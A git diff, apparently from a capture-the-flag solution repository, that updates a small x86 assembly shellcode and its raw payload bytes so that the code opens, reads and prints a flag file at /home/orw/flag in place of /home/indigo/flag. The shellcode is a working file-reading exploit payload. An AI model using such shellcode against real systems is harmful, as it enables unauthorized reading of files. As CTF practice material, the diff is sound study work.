diff options
-rwxr-xr-x | fread | bin | 4296 -> 4292 bytes | |||
-rw-r--r-- | fread.asm | 4 | ||||
-rw-r--r-- | fread.o | bin | 528 -> 528 bytes | |||
-rwxr-xr-x | payload | 2 |
4 files changed, 3 insertions, 3 deletions
Binary files differ @@ -9,7 +9,7 @@ xor ecx, ecx ; arg2 xor edx, edx ; #/usr/include/asm-generic/fcntl.h includes define O_RDONLY 00000000 pop ebx -mov [ebx + 18], ecx ; arg1 +mov [ebx + 15], ecx ; arg1 int 0x80 ;eax now contains our file descriptor. @@ -33,5 +33,5 @@ int 0x80 data: call str_found -db "/home/indigo/flag" +db "/home/orw/flag" @@ -1 +1 @@ -ë$1À°1É1Ò[‰KÍ€‰Ã°‰á1Ò²ÿÍ€°1Û³‰áÍ€è×ÿÿÿ/home/indigo/flag
\ No newline at end of file +ë$1À°1É1Ò[‰KÍ€‰Ã°‰á1Ò²ÿÍ€°1Û³‰áÍ€è×ÿÿÿ/home/orw/flag
\ No newline at end of file |